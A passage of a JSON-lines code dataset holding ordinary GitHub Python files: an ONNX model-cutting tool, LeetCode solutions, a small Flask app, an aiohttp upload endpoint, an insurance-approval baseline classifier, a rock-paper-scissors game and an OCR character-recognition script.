onnx_model = onnx.version_converter.convert_version(onnx_model, dst_version)\n onnx_model.ir_version = 7 if onnx_model.ir_version > 7 else onnx_model.ir_version\n return onnx_model\n\nargs = parse_args()\nsrcPath = args.input_model\ndstPath = args.output_model\ndst_opset_version = args.set_opset_version\ntensor_names_list = args.tensor_names\nkept_branchs_list = args.untruncated_branch\nconvert_opset = args.convert_opset\n\nlogger = logging.getLogger(\"[ToolCutModel]\")\nlogger.info('Start chopping the model based on the specified information ...')\nonnx_model = onnx.load_model(srcPath)\nonnx_modelCp = copy.deepcopy(onnx_model)\nnetOutNames = [netOutput.name for netOutput in onnx_modelCp.graph.output]\nfor node in onnx_modelCp.graph.node:\n for output in node.output:\n if output not in tensor_names_list:\n continue\n logger.info('Now, processing %s'%output)\n cur_shape = get_shape_by_name(onnx_modelCp, output)\n curOutNodesList = get_node_by_input(onnx_modelCp, [output])\n while curOutNodesList:\n curOutsList = []\n for curOutNode in curOutNodesList:\n if curOutNode.name in kept_branchs_list:\n continue\n curOutsList += list(curOutNode.output)\n onnx_model.graph.node.remove(curOutNode)\n curOutNodesList = get_node_by_input(onnx_modelCp, curOutsList)\n outDtype = get_dtype_by_name(onnx_modelCp, output)\n output_value_info = onnx.helper.make_tensor_value_info(output, outDtype, cur_shape)\n onnx_model.graph.output.append(output_value_info)\n \nonnx_model = delete_useless_outputOfModel(onnx_model)\nonnx_model = create_tensor_without_outconnect_to_netoutput(onnx_model)\nonnx_model = delete_useless_input_in_initializer(onnx_model)\nonnx_model = delete_useless_value_info(onnx_model)\nlogger.info('Finish chop the model!')\n\nif convert_opset:\n logger.info('Start converting opset version for the model ...')\n onnx_model = convert_opset_version(onnx_model, dst_opset_version)\n logger.info('Finish convert opset version!')\n\nonnx_model, check = simplify(onnx_model)\nlogger.info(\"Saving output model to '%s'\"%dstPath)\nonnx.save_model(onnx_model, dstPath)\nlogger.info('Process Finish!')","repo_name":"xncaffe/deployOnnxGraphOpt","sub_path":"tools/cut_model.py","file_name":"cut_model.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"23099245558","text":"class Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n x,y = reduce(lambda x,y:x^y,nums),1\n while x&y != y:\n y <<= 1\n c1,c2 = 0,0\n for z in nums:\n if z&y == y:\n c1 ^= z\n else:\n c2 ^= z\n return [c1,c2]","repo_name":"duduscript/leetcode","sub_path":"260/SingleNumberIII.py","file_name":"SingleNumberIII.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"17303263953","text":"from flask import Flask, render_template\nimport requests\n\napp = Flask(__name__)\n\n\"\"\"Fetch the latest post for embedded context\"\"\"\ndef get_post_embed():\n request = requests.get('https://life.lunatech.com/wp-json/wp/v2/posts/?context=embed&per_page=1')\n post = request.json()[0]\n return {'link': post['link'], 'title': post['title']['rendered'], 'featured_media': post['featured_media'], 'featured_media_url': post['jetpack_featured_media_url']}\n\n@app.route('/')\ndef home():\n pe = get_post_embed()\n return render_template('home.html', title=pe['title'], link=pe['link'], image=pe['featured_media_url'])\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"lunatech-labs/lunatech-website-group","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21944027675","text":"#\n# @lc app=leetcode id=91 lang=python3\n#\n# [91] Decode Ways\n#\n\n# @lc code=start\nclass Solution: \n def numDecodings(self, s: str) -> int:\n # def isValid(str):\n # if str[0] == '0':\n # return False\n # return True\n \n # def dfs(start, path):\n # if start == len(s):\n # res.append(''.join(path))\n # return \n \n # for i in s:\n # if isValid\n\n # With n digits, there are O(2^n) nodes in the state-space tree.\n # We do O(1) operation for each node so the overall time complexity is O(2^n).\n memo = {}\n\n def dfs(start_index):\n if start_index in memo:\n return memo[start_index]\n if start_index == len(s):\n return 1\n\n ways = 0\n # can't decode string with leading 0\n if s[start_index] == '0':\n return ways\n # decode one digit\n ways += dfs(start_index + 1)\n # decode two digits\n if 10 <= int(s[start_index: start_index + 2]) <= 26:\n ways += dfs(start_index + 2)\n memo[start_index] = ways\n return ways\n\n return dfs(0)\n \n # The time complexity of the memoization solution is the size of the memo array O(n) multiplied by the number of operations per state which is O(1). \n # So the overall time complexity is O(n).\n# @lc code=end\n\n","repo_name":"yihaozhong/LPractice","sub_path":"91.decode-ways.py","file_name":"91.decode-ways.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12168581200","text":"import os\nimport subprocess\n\nfrom dotenv import load_dotenv\n\n\ndef run_data_ingestion():\n dotenv_path = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"../../../.env\"\n )\n load_dotenv(dotenv_path)\n\n args = {\n \"sa_path\": os.environ.get(\"SA_PATH\"),\n \"bucket\": os.environ.get(\"BUCKET\"),\n \"project_id\": os.environ.get(\"PROJECT_ID\"),\n }\n\n command = [\"python\", \"data_ingestion.py\"]\n\n for key, value in args.items():\n if value is not None:\n command.extend([\"--\" + key, str(value)])\n\n subprocess.run(command)\n\n\nif __name__ == \"__main__\":\n run_data_ingestion()\n","repo_name":"tamerajaj/w2d5-mle-data-pipeline-project","sub_path":"src/cloud-etl/data-ingestion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32477419453","text":"import csv\nfrom sklearn.metrics import confusion_matrix\n\nprovider_names = {}\nregions = {}\ndiagnosis_codes = {}\ndiagnosis_names = {}\n\n# read all training files and form rules\nwith open('data/training/Diagnosis_Code_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_codes[row[0]] = 1\n\nwith open('data/training/Diagnosis_Code_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_codes[row[0]] = 0\n\nwith open('data/training/Diagnosis_Name_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_names[row[0]] = 1\n\nwith open('data/training/Diagnosis_Name_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n diagnosis_names[row[0]] = 0\n\nwith open('data/training/provier_approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n provider_names[row[0]] = 1\n\nwith open('data/training/provier_deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n provider_names[row[0]] = 0\n\nwith open('data/training/Region_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n regions[row[0]] = 1\n\nwith open('data/training/Region_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n regions[row[0]] = 0\n\n# read 100% approved and denied in the test set\ntest_provider_names = {}\ntest_regions = {}\ntest_diagnosis_codes = {}\ntest_diagnosis_names = {}\n\nwith open('data/test/Diagnosis_Code_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_codes[row[0]] = 1\n\nwith open('data/test/Diagnosis_Code_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_codes[row[0]] = 0\n\nwith open('data/test/Diagnosis_Name_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_names[row[0]] = 1\n\nwith open('data/test/Diagnosis_Name_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_diagnosis_names[row[0]] = 0\n\nwith open('data/test/Provider_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_provider_names[row[0]] = 1\n\nwith open('data/test/Provider_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_provider_names[row[0]] = 0\n\nwith open('data/test/Region_Approve.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_regions[row[0]] = 1\n\nwith open('data/test/Region_Deny.csv', newline='') as csvfile:\n diagnosis_reader = csv.reader(csvfile, delimiter=',')\n header = True\n for row in diagnosis_reader:\n if header:\n header = False\n continue\n test_regions[row[0]] = 0\n# ****************************************\n\npredicted = []\nlabeled = []\n\ntotal_correct_prediction = 0\ntotal_100_in_train_and_test = 0\ntotal_100_correct_prediction = 0\ntotal_below_100_or_100_in_test_not_train = 0\ntotal_below_100_or_100_in_test_not_train_correct_prediction = 0\n# read test file\nwith open('data/test.csv', newline='') as testfile:\n test_reader = csv.DictReader(testfile, delimiter=',')\n check_columns = [\"feed_id_full_path\", \"Diagnosis_Code\", \"Diagnosis_Name\", \"Requesting_Provider\", \"Overall_Auth_Status\",\"Line_Item_Status\",\"Status_Reason\"]\n header = True\n for row in test_reader:\n if header:\n header = False\n continue\n\n if 'APPROVE' == row['Overall_Auth_Status']:\n current_label = 1\n else:\n current_label = 0\n\n labeled.append(current_label)\n\n provider_name = row['Requesting_Provider']\n region = row['feed_id_full_path']\n diagnosis_code = row['Diagnosis_Code']\n diagnosis_name = row['Diagnosis_Name']\n\n # try to make incorrect prediction xor 1\n predicted_label = current_label ^ 1\n\n if provider_name in provider_names:\n predicted_label = provider_names[provider_name]\n predicted.append(predicted_label)\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n elif region in regions:\n predicted_label = regions[region]\n predicted.append(predicted_label)\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n elif diagnosis_code in diagnosis_codes:\n predicted_label = diagnosis_codes[diagnosis_code]\n predicted.append(predicted_label)\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n elif diagnosis_name in diagnosis_names:\n predicted_label = diagnosis_names[diagnosis_name]\n predicted.append(diagnosis_names[diagnosis_name])\n total_100_in_train_and_test = total_100_in_train_and_test + 1\n else:\n # try to make incorrect prediction\n predicted_label = 1 # predict true by default\n predicted.append(predicted_label)\n\n if predicted_label == current_label:\n total_correct_prediction = total_correct_prediction + 1\n # count 100% correct prediction\n if provider_name in test_provider_names and provider_name in provider_names and current_label == provider_names[provider_name]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n elif region in test_regions and region in regions and current_label == regions[region]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n elif diagnosis_code in test_diagnosis_codes and diagnosis_code in diagnosis_codes and current_label == diagnosis_codes[diagnosis_code]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n elif diagnosis_name in test_diagnosis_names and diagnosis_name in diagnosis_names and current_label == diagnosis_names[diagnosis_name]:\n total_100_correct_prediction = total_100_correct_prediction + 1\n\n # count < 100% accuracy\n if (provider_name not in provider_names) and \\\n (region not in regions) and \\\n (diagnosis_code not in diagnosis_codes) and \\\n (diagnosis_name not in diagnosis_names):\n\n total_below_100_or_100_in_test_not_train = total_below_100_or_100_in_test_not_train + 1\n if predicted_label == current_label:\n total_below_100_or_100_in_test_not_train_correct_prediction = total_below_100_or_100_in_test_not_train_correct_prediction + 1\n\n\nCM = confusion_matrix(labeled, predicted, labels=[1, 0])\nTN, FP, FN, TP = CM.ravel()\n# TN = CM[0][0]\n# FN = CM[1][0]\n# TP = CM[1][1]\n# FP = CM[0][1]\ncount_true = 0\nfor i in range(len(labeled)):\n if labeled[i] == predicted[i]:\n count_true = count_true + 1\n\nprecision = TP / (TP + FP)\nrecall = TP / (TP + FN)\nfscore = (2*TP) / (2*TP + FP + FN)\naccuracy = (TP + TN) / (TP + TN + FN + FP)\n\nprint('total test set:', len(predicted))\nprint('total test set -correct prediction:', total_correct_prediction)\n\nprint()\nprint('total 100% accuracy:', total_100_in_train_and_test)\nprint('total 100% accuracy correct prediction:', total_100_correct_prediction)\nprint('100% accuracy prediction: ', (total_100_correct_prediction / total_100_in_train_and_test))\n\nprint()\nprint('total below or 100% accuracy in test not in train:', total_below_100_or_100_in_test_not_train)\nprint('total below or 100% accuracy in test not in train - correct prediction:', total_below_100_or_100_in_test_not_train_correct_prediction)\nprint('below or 100% accuracy in test not in train - accuracy prediction: ', (total_below_100_or_100_in_test_not_train_correct_prediction / total_below_100_or_100_in_test_not_train))\n\nprint()\nprint('Overall')\nprint('precision:', precision, ';recall:', recall)\nprint('f-score:', fscore, ';accuracy:', accuracy)\n\n","repo_name":"litpuvn/insured-prediction","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6054646981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 20 22:12:33 2020\n設計一個程式由1~10的亂數隨機產生一10*10的二維陣列,將行列互換輸出(即輸出轉置矩陣)\n@author: ASUS\n\"\"\"\nimport numpy as np\nimport random as rnd\nary = np.zeros((10,10),dtype=int)\nary2 = np.zeros((10,10),dtype=int)\n\nfor i in range(10):\n for j in range(10):\n number= rnd.randint(1,10);\n ary[i][j]=number\n \nprint('未轉置前:')\nprint(ary)\nfor i in range(10):\n for j in range(10):\n ary2[i][j]=ary[j][i]\nprint('轉置後:')\nprint(ary2)","repo_name":"Hansel-Lin420/Python_Asia100","sub_path":"Ex05.py","file_name":"Ex05.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70666386925","text":"import numpy as np\nimport pandas as pd\nimport os\n\nfrom . import defaults, misc\ndefault_dir = defaults.base_dir() + 'crosswalk/'\n\ndata_dir = default_dir\n\ndef county_to_zip(year=2000, zip_level=5, data_dir=default_dir, reimport=False):\n\n assert zip_level in [1, 2, 3, 4, 5]\n\n pkl_file = data_dir + 'county_to_zip{0:d}_{1:d}.pkl'.format(zip_level, year)\n if reimport or (not os.path.exists(pkl_file)):\n\n names = ['fips', 'zip', 'county_name', 'zip_name', 'pop', 'factor']\n df = pd.read_csv(data_dir + 'county_to_zip_{:d}.csv'.format(year),\n skiprows=2, header=None, names=names, \n usecols=['fips', 'zip', 'factor'])\n\n if zip_level < 5:\n to_drop = 5 - zip_level\n zip_var = 'zip' + str(zip_level)\n df[zip_var] = df['zip'].astype(str).str[:-to_drop].astype(np.int)\n df = df.groupby(['fips', zip_var])['factor'].sum().to_frame(name='factor')\n df = df.reset_index()\n else:\n zip_var = 'zip'\n \n df['total'] = df.groupby(['fips'])['factor'].transform(sum)\n df['factor'] /= df['total']\n df = df.drop(columns=['total'])\n \n df.to_pickle(pkl_file)\n\n else:\n\n df = pd.read_pickle(pkl_file)\n\n return df\n\ndef county_to_zip_hud(data_dir=default_dir, reimport=True):\n \n parquet_file = data_dir + 'county_to_zip_hud.parquet'\n if reimport or (not os.path.exists(parquet_file)):\n df = pd.read_excel(data_dir + 'COUNTY_ZIP_122021.xlsx')\n df.to_parquet(parquet_file)\n else:\n df = pd.read_parquet(parquet_file)\n \n return df\n\ndef zip_to_county_hud(data_dir=default_dir, reimport=True):\n \n parquet_file = data_dir + 'zip_to_county_hud.parquet'\n if reimport or (not os.path.exists(parquet_file)):\n df = pd.read_excel(data_dir + 'ZIP_COUNTY_122021.xlsx')\n df.to_parquet(parquet_file)\n else:\n df = pd.read_parquet(parquet_file)\n \n return df\n \n\n#def load(origin='county', destination='zip', year=2000, data_dir=default_dir, reimport=False):\n#\n# intermediate_dests = {\n# 'zip3' :' zip',\n# }\n#\n# pkl_file = data_dir + '{0}_to_{1}_{2:d}.pkl'.format(origin, destination, year)\n# if reimport or os.path.exists(pkl_file):\n#\n# this_dest = intermediate_dests.get(destination, destination)\n# df = pd.read_csv(data_dir + '{0}_to_{1}_{2:d}'.format(origin, this_dest))\n#\n# else:\n#\n# df = pd.read_pickle(pkl_file)\n#\n# return df\n","repo_name":"dgreenwald/py_tools","sub_path":"datasets/crosswalk.py","file_name":"crosswalk.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25127085841","text":"# -*- coding:utf-8 -*-\n\nimport botpath\nimport logging\nfrom termcolor import colored, cprint\nimport rasa_core\n\nTEST_DIALOG = False\n\n\n\n\n\ndef run():\n logging.basicConfig(level=logging.DEBUG,\n format=\"[%(filename)s:%(lineno)s] %(name)s - %(levelname)s - %(message)s\")\n\n print(\"=> Importing tensorflow...\")\n import tensorflow as tf\n tf.logging.set_verbosity(tf.logging.ERROR)\n\n print(\"=> Importing rasa...\")\n from rasa_core.interpreter import RasaNLUInterpreter\n from rasa_core.channels.console import ConsoleInputChannel\n from rasa_core.agent import Agent\n\n print(\"=> HC NLU Bot Initializing...\")\n print(\"Load NLU %s\" % botpath.NLU_DATA_FOLDER)\n interpreter = RasaNLUInterpreter(botpath.NLU_DATA_FOLDER)\n\n print(\"Load dialog %s\" % botpath.DIALOGUE_PATH)\n agent = Agent.load(botpath.DIALOGUE_PATH, interpreter=interpreter)\n if TEST_DIALOG:\n agent.handle_channel(ConsoleInputChannel())\n else:\n rasa_core.policies.MemoizationPolicy.ENABLE_FEATURE_STRING_COMPRESSION = False\n index = 0\n dialogs = [\n# ('车险', 'None\\n'),\n ('你好', '欢迎致电世界500强平安,我是王伟,工号6500\\n请问怎么称呼您\\n'),\n ('我叫张三丰', '欢迎你, 张三丰\\n请问您需要什么服务?\\n'),\n ('车险', '请问你的车牌是什么?\\n'),\n ('我的车牌是沪A12345', '您是平安的老客户了, 去年你投保的项目如下车损险,不计免赔,三责险100万, 车牌为沪牌, 总保费是5000元\\n'\n '请问确认要投保吗?\\n'),\n ('确认', '张三丰, 您的车牌号为沪a12345的车投保已成功,保险费为5000,谢谢.\\n'\n '请问您需要什么服务?\\n'),\n ]\n\n for question, expect in dialogs:\n cprint((\"%d. \" % index) + question, 'yellow')\n answers = agent.handle_message(question)\n answers_text = ''\n for msg in answers:\n if 'text' in msg:\n answers_text += msg['text'] + '\\n'\n if len(answers_text) == 0:\n answers_text = \"No answer\\n\"\n cprint((\"%d. \" % index) + answers_text, 'green')\n if answers_text != expect:\n cprint((\"测试失败, 期望:%s\\n\" % expect), 'red', attrs=['bold', 'blink'])\n break\n index += 1\n print(\"测试结束\")\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"fenixchen/bot","sub_path":"hcbot/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37368937070","text":"import os\nimport re\n\ndef read_all_files(folder):\n \"\"\"\n Reads all the files in the folder\n \"\"\"\n for root,dirs,files in os.walk(folder):\n print(\"Root: \", root)\n print(\"Dirs: \", dirs)\n print(\"Files: \", files)\n print(\"=====================================\")\n pattern = r\"\\.(exe|jpg|pyc)$\"\n for file in files:\n print(\"File: \", file)\n match = re.search(pattern, file)\n if match:\n pass\n else:\n with open(os.path.join(root,file),\"r\") as f:\n #print(f.read())\n print(len(f.read()))\n print(\"=====================================\")\n\nif __name__ == \"__main__\":\n path = \"D:\\projects\\LARGE Projects\\ipfs_uploader\"\n read_all_files(path)","repo_name":"arjunprakash027/collections","sub_path":"randoms/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74498879404","text":"import os\n\nfrom aiohttp import web\nfrom dotenv import load_dotenv\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import sessionmaker\n\nfrom services import create_document_from_uploaded_json\n\nload_dotenv()\n\nCONNECTION_URL = os.getenv('CONNECTION_URL')\nAPI_PORT = int(os.getenv('API_PORT'))\n\nengine = create_async_engine(CONNECTION_URL, pool_size=1, max_overflow=0)\nasync_session = sessionmaker(engine, expire_on_commit=False, class_=AsyncSession)\n\n\nasync def handle_upload(request):\n async with async_session() as session:\n async with session.begin():\n uploaded_document = await request.json()\n try:\n await create_document_from_uploaded_json(session=session, uploaded_document=uploaded_document)\n except IntegrityError:\n return web.Response(status=500)\n return web.Response()\n\n\nif __name__ == '__main__':\n app = web.Application()\n\n app.router.add_route(method='post', path='/upload/document/', handler=handle_upload)\n\n web.run_app(app, port=API_PORT)\n","repo_name":"Apoleonik/SmartMerchTask","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72253602922","text":"import secrets\n\nplayer_score = 0\ncomputer_score = 0\nwhile player_score < 3 and computer_score < 3: \n print(\"..paper..\")\n print(\"..rock..\")\n print(\"..scissors..\")\n print(f'Player score: {player_score}')\n print(f'Computer Score: {computer_score}')\n player1 = input().lower()\n computer = ['rock', 'paper', 'scissors']\n cpu = secrets.choice(computer)\n\n if player1 == 'quit' or player1 == 'q':\n break\n\n if player1 == cpu:\n print('Draw!')\n elif player1 == 'paper':\n if cpu == 'rock':\n print('player 1 wins!')\n player_score += 1\n else:\n print('cpu wins!')\n computer_score += 1\n elif player1 == 'rock':\n if cpu == 'scissors':\n print('player 1 wins!')\n player_score += 1\n else:\n print('cpu wins!')\n computer_score += 1\n elif player1 == 'scissors':\n if cpu == 'paper':\n print('player 1 wins!')\n player_score += 1\n else:\n print('cpu wins!')\n computer_score += 1\n else: \n print('Please enter a valid move!')\n\n\nprint(f'Player score: {player_score}')\nprint(f'Computer Score: {computer_score}')\nif player_score == 3:\n print('Player wins!')\nelif player_score == computer_score:\n print(\"It's a tie\")\nelse:\n print('Computer wins!')","repo_name":"babaliauskas/Python","sub_path":"RockPaperScissors/rockpaperscissors2.py","file_name":"rockpaperscissors2.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39538704520","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#inputs\nimport os\nparent_directory = os.path.abspath('')\nroot = os.path.abspath(os.path.join(parent_directory, os.pardir))\ndata_folder = '01-Data'\nclassifiers_folder = '02-Classifiers'\ngan_char_models_folder = 'models_char_gan'\nmodel_digits_letters_name = 'class_char_model_{}.h5'\nmixed_models_folder = 'models_mixed'\nmodel_symbols_letters_name = 'model_0symbol_1letter.h5'\nmodel_0_oO_name = 'model_0_oO.h5'\n\ncharacters_folder = 'characters'\ntest_images_folder = os.path.join(parent_directory, characters_folder)\ncharacter_to_test = '{}.png'\n\ndata_input_folder = os.path.join(root, 'test', 'data', 'input')\n\n\n# In[2]:\n\n\nfrom functions_score import *\nfrom functions_char_preparation import *\nfrom char_classification import classification, image_char_prepr\nimport sys\nimport shutil\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport string\nimport pandas as pd\nimport keras.backend as K #clear RAM\nimport docx\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n# In[3]:\n\n\ncwd = os.getcwd()\ncwd\n\n\n# In[4]:\n\n\ndef buidDictionary():\n\n characters_all = list(string.printable)[:-6] #+['ç']# <\n j=-1\n dict_target=[]\n for char in characters_all:\n j=j+1\n dict_target.append([char,ord(char),j])\n dictionar=pd.DataFrame(dict_target).rename(columns={0:'Actual_char',1:'Actual_num',2:'Actual_id'})\n\n dictionar_symbols=dictionar[62:94]\n dictionar_letters=dictionar[0:62]\n\n #threshold for _,-\n from pandas import DataFrame\n pd_ = DataFrame(np.arange(0,32,1))\n Q1_ = pd_.quantile(0.25)\n Q3_ = pd_.quantile(0.75)\n IQR_ = Q3_ - Q1_\n\n return characters_all, dictionar, dictionar_letters, dictionar_symbols, Q1_, Q3_\n\n\n# In[5]:\n\n\nclass ML_Models():\n def addModel(self, modelsPath, modelOgirinalName, modelName):\n #char_models_filename = modelsPath.format(ord(char))\n char_models_filename = os.path.join(modelsPath, modelOgirinalName)\n print('char_models_filename', char_models_filename)\n\n if not hasattr(self, modelName):\n ml_model=tf.keras.models.load_model(char_models_filename)\n\n if modelName:\n setattr(self, modelName, ml_model)\n else:\n setattr(self, modelOgirinalName, ml_model)\n else:\n print('model ', modelName, ' in memory')\n\n\n# In[6]:\n\n\ndef loadModels(characters_all):\n \n if not 'charModels' in globals():\n print('charModels not in locals neither in globals')\n global charModels\n charModels = ML_Models()\n print('charModels', charModels)\n\n gan_char_models_path = os.path.join(root, classifiers_folder, gan_char_models_folder)\n for char in characters_all[0:62]:\n print(char)\n charModels.addModel(gan_char_models_path, model_digits_letters_name.format(ord(char)), f'model_letters{ord(char)}')\n #K.clear_session()\n\n\n mixed_models_path = os.path.join(root, classifiers_folder, mixed_models_folder)\n for char in characters_all[62:94]:\n print(char)\n charModels.addModel(mixed_models_path, model_symbols_letters_name, f'model_symbols{ord(char)}')\n #K.clear_session()\n \n charModels.addModel(mixed_models_path, model_symbols_letters_name, 'model_symbols_letters') \n charModels.addModel(mixed_models_path, model_0_oO_name, 'model_0_oO')\n\n else:\n print('charModels instantiated') \n\n return charModels\n\n\n# In[7]:\n\n\ndef char_img_preprocessing(img):\n #print('char_img_preprocessing', img)\n\n #img = cv2.imread(char_image)\n #print('img', img)\n #img = cv2.imread('C:\\\\Users\\\\Administrator\\\\OCR\\\\Final\\\\04-Recognition\\\\characters\\\\2.png')\n\n sorted_ctrs = char_preprocessing_step_1(img)\n #print('sorted_ctrs', sorted_ctrs)\n new_sorted_ctrs = char_preprocessing_step_2(sorted_ctrs,img)\n #print('new_sorted_ctrs', new_sorted_ctrs)\n temp_max_yh,temp_min_y = char_preprocessing_step_3(new_sorted_ctrs) #normalize height\n #print('temp_max_yh', temp_max_yh)\n #print('temp_min_y', temp_min_y)\n \n char_image,char_image_nh = char_preprocessing_step_4(img,new_sorted_ctrs,temp_max_yh,temp_min_y)\n \n return char_image, char_image_nh\n\n\n# In[8]:\n\n\ndef char_recognition(charModels, new_img, new_img_normheight, dictionar, dictionar_letters, dictionar_symbols, Q1_,Q3_): #recognize char \n import cv2 \n import numpy as np\n \n resized=image_char_prepr(new_img,2,20,0)\n resized_normheight=image_char_prepr(new_img_normheight,2,20,0)\n\n new_image_density=resized.sum()\n\n x_test_right = np.expand_dims(resized, axis=-1)\n x_test = np.expand_dims(x_test_right, axis=0)\n forecast,dictionartemp = classification(charModels, resized, resized_normheight, x_test, Q1_, Q3_, dictionar, dictionar_letters, dictionar_symbols)\n text_char =str(forecast)\n return text_char\n\n\n# In[9]:\n\n\n'''\ncaracteres com problemas: 132, 140, 147, 186, 194, 233, 241, 280, 288\n'''\nunhandledChars = [140, 147, 186, 194, 233, 241, 280, 288]\n\n\n\n\n# In[12]:\n\n\ndef main(char_image):\n print('CHAR_RECOGNITION')\n if len(char_image) == 0:\n data_input_folder = os.path.join(root, 'test', 'data', 'input')\n data_input_char_folder = os.path.join(data_input_folder, 'char_recognition')\n char_images_names = [f for f in listdir(data_input_char_folder) if isfile(join(data_input_char_folder, f))]\n print('char_images_names', char_images_names)\n char_image_name = char_images_names[0]\n char_image=cv2.imread(os.path.join(data_input_char_folder, char_image_name))\n\n characters_all, dictionar, dictionar_letters, dictionar_symbols, Q1_, Q3_ = buidDictionary()\n \n charModels = loadModels(characters_all)\n\n _char_image, char_image_nh = char_img_preprocessing(char_image)\n\n text_char = char_recognition(charModels, _char_image[0], char_image_nh[0], dictionar, dictionar_letters, dictionar_symbols, Q1_, Q3_)\n print('text_char', text_char)\n\n return text_char\n\n\nif __name__ == '__main__':\n main(sys.argv[1]) \n\n","repo_name":"luispmb/orc","sub_path":"controllers/char_recognition.py","file_name":"char_recognition.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36547736470","text":"import math\nfrom collections import Counter\n\n\nclass Solution:\n def numTilePossibilities(self, tiles: str) -> int:\n combinations = set()\n\n def calculate_combinations(arr, start, prev, length):\n if len(prev) == length:\n combinations.add(\"\".join(prev))\n return\n\n for pos in range(start, len(arr)):\n prev.append(arr[pos])\n calculate_combinations(arr, pos + 1, prev, length)\n prev.pop()\n\n tiles_sorted = list(sorted(tiles))\n\n for length in range(1, len(tiles_sorted) + 1):\n calculate_combinations(tiles_sorted, 0, [], length)\n\n result = 0\n for combination in combinations:\n sub_result = 